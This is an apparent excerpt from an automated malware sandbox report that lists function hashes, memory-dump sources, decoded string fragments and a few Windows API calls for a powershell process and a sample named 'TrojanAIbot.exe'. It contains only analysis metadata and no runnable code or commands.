Opcode Fuzzy Hash: 450525c44737e8c20065ccf0007a4fb2d7c47210f602d70ec9b71a194ee29c3d
Instruction Fuzzy Hash: EAE0DF2634D2D51A8F16823DA4604AAAFB7CEC326032D81FAE4C5CF242D8618C4783A1

Function 04999168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc88bcacd3f5e150a565f1aad8e29a848ceeda7dc2dc92436a8b5044de8354fe
Instruction ID: ab9b201d379a4b2691efcb996997f2a212893df88d53cc2cfec41b2304249af8
Opcode Fuzzy Hash: bc88bcacd3f5e150a565f1aad8e29a848ceeda7dc2dc92436a8b5044de8354fe
Instruction Fuzzy Hash: 87F06D709007148FD7649F78E89C79ABBE9FB44310F00446DE20EC7340DB3568808B90

Function 04998978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7c9cf892f2d7aedf41f3c793e1b5b8131342da5e5f5abf09e0f3d9c78bc300
Instruction ID: 4c4a7b976a4afb0225c7b2e5db489fd38c56ba93a08524f63a0fd183a6069579
Opcode Fuzzy Hash: dc7c9cf892f2d7aedf41f3c793e1b5b8131342da5e5f5abf09e0f3d9c78bc300
Instruction Fuzzy Hash: 8FE0263930463887CB083B78B40C2AE7A96EBC5724F04006EE71783341CFB82D0183D5

Function 04999550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b62c12133f413c4a2f1960d1d008d88d270b7441ac93ef4bef74a4d1085902b
Instruction ID: f9e2a9c63677c271f1b18c9124ed6c1298569c5f0bfd12f45c5a69860657ece0
Opcode Fuzzy Hash: 0b62c12133f413c4a2f1960d1d008d88d270b7441ac93ef4bef74a4d1085902b
Instruction Fuzzy Hash: 5DD09E5275212527AF94B5BE18106BBA5CE8AC64A9705013EDE09C7341FD54EC1A47F2

Function 0499DC98 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ecb2e152c2bee2fa84359de10563f982c8861d4cf4061bfa6684ab8f692c6d9
Instruction ID: 33a69dcd1166dffcd5e15f3c67a43cd64db07c85c45c4efe5c470920c60611b6
Opcode Fuzzy Hash: 7ecb2e152c2bee2fa84359de10563f982c8861d4cf4061bfa6684ab8f692c6d9
Instruction Fuzzy Hash: 9EE0C231700714579611A71EA80085FB7EBDFC5AB5308853EE14AC7300EFB4EC0687E6

Function 0499DCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 0ebe97919a970ab580f8a9ccddc5e24e2f352a0ef446259e463d0aef53613241
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 23E08631B10014978B08999DD4544EDF7AADFCC220F04847AD90AA7740DA326D1586E1

Function 04998739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6d3596e178f561e70da152162c6bfc7f2dbdb7996800ba9f92e626607f8ba4
Instruction ID: b70e7afe5fd566f6d6bdd7c9b1dbedeb003979780cf69c1cb345f43f0cea59b2
Opcode Fuzzy Hash: 4e6d3596e178f561e70da152162c6bfc7f2dbdb7996800ba9f92e626607f8ba4
Instruction Fuzzy Hash: CEE04F3890405D8BCB09BBA4F45A8AD7F70FE05301B0005ECE9A752192EA61094BCBC1

Function 04998800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 614a3136d3b0b7cfab0acf04db40a468c961c7f4808db505861d74e45587bef0
Instruction ID: 40c7b35819ab558c629320a66a219eec3a105c94febbc194ebe71e92f3d7d6ef
Opcode Fuzzy Hash: 614a3136d3b0b7cfab0acf04db40a468c961c7f4808db505861d74e45587bef0
Instruction Fuzzy Hash: 65E04838D0824A8BCB15DB78E44646EBFF0FF46254B1052ADE95797602D6311886DF81

Function 0499F3C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0c592e08dc831d3511c70459cc005d62bdc30dde8623563a1f9bfefb5ff770
Instruction ID: 4a6f9601024adeeba34f947365faf61bf4f921417f51fa0c4fef28afe290ad21
Opcode Fuzzy Hash: 8d0c592e08dc831d3511c70459cc005d62bdc30dde8623563a1f9bfefb5ff770
Instruction Fuzzy Hash: EFE01A70E0414A8F8F80DFBC84815A9FFF1EB59240B2085AEC908E6201E2324A118F81

Function 0499F3D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 8aecd1bcdc9a334a7e27777f311a9932505e944a22103cc24d78dd0b7300f744
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: D7D067B0D042099F8B80EFADC94156EFBF4EB48200F6085BA8919E7341F7329A128BD1

Function 04998748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c891a05667d5b2c7539a097148a3b808bd570c4d4c206ea6bb9b0aa0631692
Instruction ID: b4c9f37568afecd3912df857e28f1af4308fe572828e09d8ed8faee9940bc14e
Opcode Fuzzy Hash: 52c891a05667d5b2c7539a097148a3b808bd570c4d4c206ea6bb9b0aa0631692
Instruction Fuzzy Hash: 20D0173880411D8BCB08EBA4F81A4BDBB74FA00301F4001ADE91752192EA702A4ACAC0

Function 04998810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d9cda7cd4b2b42badcf1bf142137c5569957ab2f1f051c9e78f656bcded7aa
Instruction ID: 1ff1fcd420bf27abf0758993afbb705d4d8801b3778ced2001caa0766e88a051
Opcode Fuzzy Hash: 68d9cda7cd4b2b42badcf1bf142137c5569957ab2f1f051c9e78f656bcded7aa
Instruction Fuzzy Hash: EDD01738A0820E8FCB08EFA8E44686EBBF5EB45200F0041ADE90A93340EA306D41CBC1

Function 04997932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f00be81bb3507ef332631010998a58d7f436615839d745c3ce860c5effeb25
Instruction ID: 64752a935f2db77c88fdccad32dbbf9ca453aed6f191a8644b1b379abb2ddaca
Opcode Fuzzy Hash: 66f00be81bb3507ef332631010998a58d7f436615839d745c3ce860c5effeb25
Instruction Fuzzy Hash: 24D0C93404E3C49FC71BDF7896988183FB06E0362531A06DEE8868F6B7CE768448CB06

Function 04997EA0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106c6c0e3d8bfb97f578d99999e9b2c1d8f51d20457f31a4fdad547482eace5f
Instruction ID: e62caf3cb6629873666d52f9358f6aebf52ab269e48a66a2b808c38889b76cb8
Opcode Fuzzy Hash: 106c6c0e3d8bfb97f578d99999e9b2c1d8f51d20457f31a4fdad547482eace5f
Instruction Fuzzy Hash: 6AC08C1940E3C04FDF0B9B3449280033F325F4321030A45EBC081CB8B3CD640809CB12

Function 04997940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383b73cd7e739175ccf66f9d29ff230f56dd2b99bb5930d71eea4ed57aed4de6
Instruction ID: c905136be144478396e9ccdb8587bfd0c9c7f42813f466387bb4e9f16a0ec0ee
Opcode Fuzzy Hash: 383b73cd7e739175ccf66f9d29ff230f56dd2b99bb5930d71eea4ed57aed4de6
Instruction Fuzzy Hash: 01B09230044708CFC248AF79A408A187769BB4421638204A8F80E0A69A8E36E884CA48

Non-executed Functions

Function 07831BE0 Relevance: 20.4, Strings: 16, Instructions: 391COMMON

Download Yara Rule

Strings

4'q, xrefs: 07831F95
J&l, xrefs: 07832017
4'q, xrefs: 07831F89
r%l, xrefs: 07831C53
r%l, xrefs: 07831C5D
J&l, xrefs: 078320C2
pij, xrefs: 07831C73
84#l, xrefs: 07831F6C
tPq, xrefs: 07831FDF
84#l, xrefs: 07831F76
J&l, xrefs: 07831FA1
4'q, xrefs: 07831C92
J&l, xrefs: 078320CE
4'q, xrefs: 07831C86
tPq, xrefs: 07831FEB
J&l, xrefs: 0783200B

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$84#l$84#l$pij$tPq$tPq$J&l$J&l$J&l$J&l$J&l$r%l$r%l
API String ID: 0-1126545161
Opcode ID: 3b71ad7d71917cbf6a243ed2b4f71746781ffda355d611677ba860b6e5226365
Instruction ID: 459669e56899ed6c98060c06848796ed174ae51c0e580a37ae60b07e9dd773b0
Opcode Fuzzy Hash: 3b71ad7d71917cbf6a243ed2b4f71746781ffda355d611677ba860b6e5226365
Instruction Fuzzy Hash: B9D114B1F0460E8FD7249F6C941866AFBB2AFA6A11F18C0BBC945DB251DB31C845C7E1

Function 07833928 Relevance: 10.3, Strings: 8, Instructions: 317COMMON

Download Yara Rule

Strings

tPq, xrefs: 078339A5
4'q, xrefs: 07833B29
4'q, xrefs: 07833B35
$q, xrefs: 0783396C
$q, xrefs: 07833C0E
$q, xrefs: 0783393A
$q, xrefs: 07833960
tPq, xrefs: 078339B1

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q
API String ID: 0-2958727440
Opcode ID: 73854c037bf10a149edd8c16c93f6b606f2379df411ad5bf8d60ebed40d47463
Instruction ID: 6a92765b580b1992258b386cf5eb76ac35067299eda9179db4aa9d8b827a39f7
Opcode Fuzzy Hash: 73854c037bf10a149edd8c16c93f6b606f2379df411ad5bf8d60ebed40d47463
Instruction Fuzzy Hash: E5A167B17043199FD7209F6D8811766BBF6AFD6621F2880BAD849DB791CA31CC42C7E1

Function 07830488 Relevance: 9.2, Strings: 7, Instructions: 495COMMON

Download Yara Rule

Strings

4'q, xrefs: 078305EC
4'q, xrefs: 078305F6
4'q, xrefs: 07830962
fq, xrefs: 0783094B
r%l, xrefs: 0783092B
4'q, xrefs: 0783096E
r%l, xrefs: 07830935

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: fq$4'q$4'q$4'q$4'q$r%l$r%l
API String ID: 0-885150609
Opcode ID: 1337e3f7a97368f6a5ce47bd1b6582f181b64e6903a6fb6159229d1b30bb67bc
Instruction ID: 8ea3d2b10190ac651632bc0c88017a0bbd32f8f777956acc8390f0efaac1c601
Opcode Fuzzy Hash: 1337e3f7a97368f6a5ce47bd1b6582f181b64e6903a6fb6159229d1b30bb67bc
Instruction Fuzzy Hash: AEF156B1B043099FDB149F6C981076ABBA3AFD2615F18C0BBD945CB242DA75CC92C7E1

Function 07832190 Relevance: 7.6, Strings: 6, Instructions: 103COMMON

Download Yara Rule

Strings

J&l, xrefs: 078321BA
J&l, xrefs: 078322A4
J&l, xrefs: 078321C4
J&l, xrefs: 07832251
J&l, xrefs: 07832245
J&l, xrefs: 0783229A

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: J&l$J&l$J&l$J&l$J&l$J&l
API String ID: 0-746756887
Opcode ID: 685ed9755d49e955a22c8459f77556819bac5ed61ca49f21849924b06723d86c
Instruction ID: 7d1f586cd66f0e85f983b082c66af0de9db318a4523dfbe4553fbea3202a033d
Opcode Fuzzy Hash: 685ed9755d49e955a22c8459f77556819bac5ed61ca49f21849924b06723d86c
Instruction Fuzzy Hash: 433145F16093556FD3258A285C21B67BB657BE3211B1880ABD8C1EFA81C9709CC1C3F2

Function 078324D2 Relevance: 7.6, Strings: 6, Instructions: 96COMMON

Download Yara Rule

Strings

4'q, xrefs: 0783260D
pij, xrefs: 07832582
J&l, xrefs: 0783259E
|,j, xrefs: 078325DB
J&l, xrefs: 078325EA
r%l, xrefs: 0783254F

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$pij$|,j$J&l$J&l$r%l
API String ID: 0-263638844
Opcode ID: 18cf515902c1e661b174b66f22d1d835b787ec3e32e29ef66a00c36c4f60ed38
Instruction ID: f3ce256dbcca8de6203287625acfd80d9316d8f4d342b85460878dfb77c33b8d
Opcode Fuzzy Hash: 18cf515902c1e661b174b66f22d1d835b787ec3e32e29ef66a00c36c4f60ed38
Instruction Fuzzy Hash: 3831E1F1A0020BDBDB24CF5DC461B66B7A5BF65315F0481AAD805DB250E735DE80CBE2

Function 04997A21 Relevance: 6.5, Strings: 5, Instructions: 241COMMON

Download Yara Rule

Strings

tM%l, xrefs: 04997AD4
`q, xrefs: 04997B23
`q, xrefs: 04997CC2
`q, xrefs: 04997BA2
`q, xrefs: 04997C44

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID: tM%l$`q$`q$`q$`q
API String ID: 0-2306036421
Opcode ID: b98eb69db3766b0ffc35e87b21827eb294772bec9f20f231bee253888a11a755
Instruction ID: 0de7f1406bfa2a20adb3bffda385760c4fd4d28bba4ca56b3355cff77197234c
Opcode Fuzzy Hash: b98eb69db3766b0ffc35e87b21827eb294772bec9f20f231bee253888a11a755
Instruction Fuzzy Hash: C6B1B074E012099FDB14DFA9D980A9DFBF2FF89300F108629D859AB304EB70A945CF91

Function 04997A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

tM%l, xrefs: 04997AD4
`q, xrefs: 04997B23
`q, xrefs: 04997CC2
`q, xrefs: 04997BA2
`q, xrefs: 04997C44

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID: tM%l$`q$`q$`q$`q
API String ID: 0-2306036421
Opcode ID: 93bb6c73bda0290f4334a1446af2730c9bd9e2ce5c2b12481b3ee71b6090c356
Instruction ID: 45881f79ae3bd814ab428a57da5cb2ed89dfcba57fed49408b634f929de5225f
Opcode Fuzzy Hash: 93bb6c73bda0290f4334a1446af2730c9bd9e2ce5c2b12481b3ee71b6090c356
Instruction Fuzzy Hash: B8B1A274E012099FDB54DFA9D980A9DFBF2FF88304F148629D819AB304EB70A945CF90

Function 04997200 Relevance: 6.5, Strings: 5, Instructions: 206COMMON

Download Yara Rule

Strings

tM%l, xrefs: 04997AD4
`q, xrefs: 04997B23
`q, xrefs: 04997CC2
`q, xrefs: 04997BA2
`q, xrefs: 04997C44

Memory Dump Source

Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4990000_powershell.jbxd

Similarity

API ID:
String ID: tM%l$`q$`q$`q$`q
API String ID: 0-2306036421
Opcode ID: 674511cc89eb321916a8db7b37107657cea29711b4480e0a04a718aa5ea102f6
Instruction ID: 5ae131b3dec0e1d168397d91b8edd3ea5ff8731a20841fa7b7ea4fac8bd7e4fa
Opcode Fuzzy Hash: 674511cc89eb321916a8db7b37107657cea29711b4480e0a04a718aa5ea102f6
Instruction Fuzzy Hash: 91A19174E012099FDB54CFA9D980A9DFBF2BF88300F148669D819AB304EB70A945CF90

Function 07833678 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

4'q, xrefs: 0783372E
4'q, xrefs: 07833722
$q, xrefs: 0783382A
$q, xrefs: 078337FF
$q, xrefs: 07833836

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 1a353cbbb3eba0b2de8790007efe87534a068c890fd69e687efdca6ab6a4bdb1
Instruction ID: d03a27bdf8b24a3dff6387dbbc7f45b1a5f63a8582bd4542629922cecc288037
Opcode Fuzzy Hash: 1a353cbbb3eba0b2de8790007efe87534a068c890fd69e687efdca6ab6a4bdb1
Instruction Fuzzy Hash: 725125F570430AAFDB245E2D8800766FBB6AFD2622F28807BD445CBA41DA75C891C7E1

Function 07831EF0 Relevance: 6.3, Strings: 5, Instructions: 84COMMON

Download Yara Rule

Strings

J&l, xrefs: 07831FA1
4'q, xrefs: 07831F89
84#l, xrefs: 07831F6C
tPq, xrefs: 07831FDF
J&l, xrefs: 0783200B

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$84#l$tPq$J&l$J&l
API String ID: 0-2638263250
Opcode ID: c965bca235fb7c1bf9ffc8614435b2e94e7a9b1144a2d5c26a3bdaa0e4def7dc
Instruction ID: 83287d4b3f41a2389be873cf8a791779be694bc944a3e26ccebffc07429a41b9
Opcode Fuzzy Hash: c965bca235fb7c1bf9ffc8614435b2e94e7a9b1144a2d5c26a3bdaa0e4def7dc
Instruction Fuzzy Hash: AA21F2B1E00A0ADFDB248F4CC459B26F7A2BFA1B15F1880A6DA04DF151C772C981C7E1

Function 07831EF8 Relevance: 6.3, Strings: 5, Instructions: 81COMMON

Download Yara Rule

Strings

J&l, xrefs: 07831FA1
4'q, xrefs: 07831F89
84#l, xrefs: 07831F6C
tPq, xrefs: 07831FDF
J&l, xrefs: 0783200B

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$84#l$tPq$J&l$J&l
API String ID: 0-2638263250
Opcode ID: 8c47d4cdf12f4717dcd369b54a46db28761453500be1003c2c9f60c2b4129b24
Instruction ID: 99f59698a10aef4279317be8f7a88a13ac2521a3c45c7285631b7f5172e687cb
Opcode Fuzzy Hash: 8c47d4cdf12f4717dcd369b54a46db28761453500be1003c2c9f60c2b4129b24
Instruction Fuzzy Hash: 3521E4B1E00A0ADBDB208E4CC459B26F7A2BFA1B15F188066DA04DF151C772D941C7E1

Function 07835798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 07835800
$q, xrefs: 078357F4
$q, xrefs: 078357C6
$q, xrefs: 078357AA

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: ca15ca4e00f3d8ffca5909a8bb05f558943266b60449fbd83023ba7bbb210faf
Instruction ID: ef03744f85451cbc5d3a588795b797ffc13287f016d42b283562f5c3d3bc3929
Opcode Fuzzy Hash: ca15ca4e00f3d8ffca5909a8bb05f558943266b60449fbd83023ba7bbb210faf
Instruction Fuzzy Hash: 0B217BB130031AABEB345E3E8801737B7D79BE1617F68843AE905CB381DDB9C85183A0

Function 07830308 Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

4'q, xrefs: 0783037F
$q, xrefs: 0783035E
$q, xrefs: 07830352
4'q, xrefs: 07830373

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: 991c7f58a48825eaaf54a695f620e69ebb3fde4281e5a47e410456707afd13b9
Instruction ID: 2ec34a0069e0a36a0f6e3dad59648f93e2d6f1b13a7f63c1441bd497e9de0245
Opcode Fuzzy Hash: 991c7f58a48825eaaf54a695f620e69ebb3fde4281e5a47e410456707afd13b9
Instruction Fuzzy Hash: E6018F6170979A5FC726162818212A6BB725FD3966B2D40E7D081DB653C96C4C4AC3A3

Function 07832108 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$q, xrefs: 07832166
$q, xrefs: 07832172
J&l, xrefs: 0783214A
J&l, xrefs: 07832156

Memory Dump Source

Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$J&l$J&l
API String ID: 0-1924908692
Opcode ID: 189e90ba801e3fa2c290f32188b821d13c8d96e86556c64a29ae04df8004cd94
Instruction ID: 796ae7bfdf3217e86e73ea03398054ed1198d6cf877b6aa3cec1b8e1006860a8
Opcode Fuzzy Hash: 189e90ba801e3fa2c290f32188b821d13c8d96e86556c64a29ae04df8004cd94
Instruction Fuzzy Hash: BE01D4B26093865FD3234A2D4C2025ABB766FE3511B294197C5C5EF266D5389C46C3F2

Analysis Process: TrojanAIbot.exePID: 8152, Parent PID: 5868COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	441
Total number of Limit Nodes:	42

Executed Functions

Function 06663360 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: d5dd825988a65975765090273862b8c41b1bf1e5deab51d7b1af3a0bba060700
Instruction ID: 2a19c54852c5594ec688a4cea8be5833e692f0e35114aabed3911fdc75ccb4e4
Opcode Fuzzy Hash: d5dd825988a65975765090273862b8c41b1bf1e5deab51d7b1af3a0bba060700
Instruction Fuzzy Hash: 17F17B70E00209DFEB54DFAAD948B9DBBF1BF88314F158169E405AB3A5DB70E945CB80

Function 015AF6C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015AF73E
GetCurrentThread.KERNEL32 ref: 015AF77B
GetCurrentProcess.KERNEL32 ref: 015AF7B8
GetCurrentThreadId.KERNEL32 ref: 015AF811

Memory Dump Source

Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7b7abc2870361cc1af2b3f3a0829640c9eccd39db3a8d197ae9f94b6b2d77230
Instruction ID: ab40344fd38e84e482ba43579ea7b85e4d787421d1fec1ca77dc2fb7b0647def
Opcode Fuzzy Hash: 7b7abc2870361cc1af2b3f3a0829640c9eccd39db3a8d197ae9f94b6b2d77230
Instruction Fuzzy Hash: E25165B090030A8FDB18CFAAD548BAEBFF1FB49314F24845AE119AB360D7746944CF65

Function 015AF6BC Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015AF73E
GetCurrentThread.KERNEL32 ref: 015AF77B
GetCurrentProcess.KERNEL32 ref: 015AF7B8
GetCurrentThreadId.KERNEL32 ref: 015AF811

Memory Dump Source

Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 19a8e24c27359dda79e496ff6a1cbeb71c78232d2101a7fcf161e1772900bdae
Instruction ID: 834c8ee0eace23865e737ff58897d0323348f925c7d3e21e92bfd8b0dc010aff
Opcode Fuzzy Hash: 19a8e24c27359dda79e496ff6a1cbeb71c78232d2101a7fcf161e1772900bdae
Instruction Fuzzy Hash: D75164B4D0030A8FEB18CFA9D548BAEBBF1FB49314F24845AE119AB360D7745944CF65

Function 065E16C0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,04234164,032DEE38,?,00000000,?,00000000,00000000), ref: 065E1877

Strings

Hq, xrefs: 065E1760

Memory Dump Source

Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

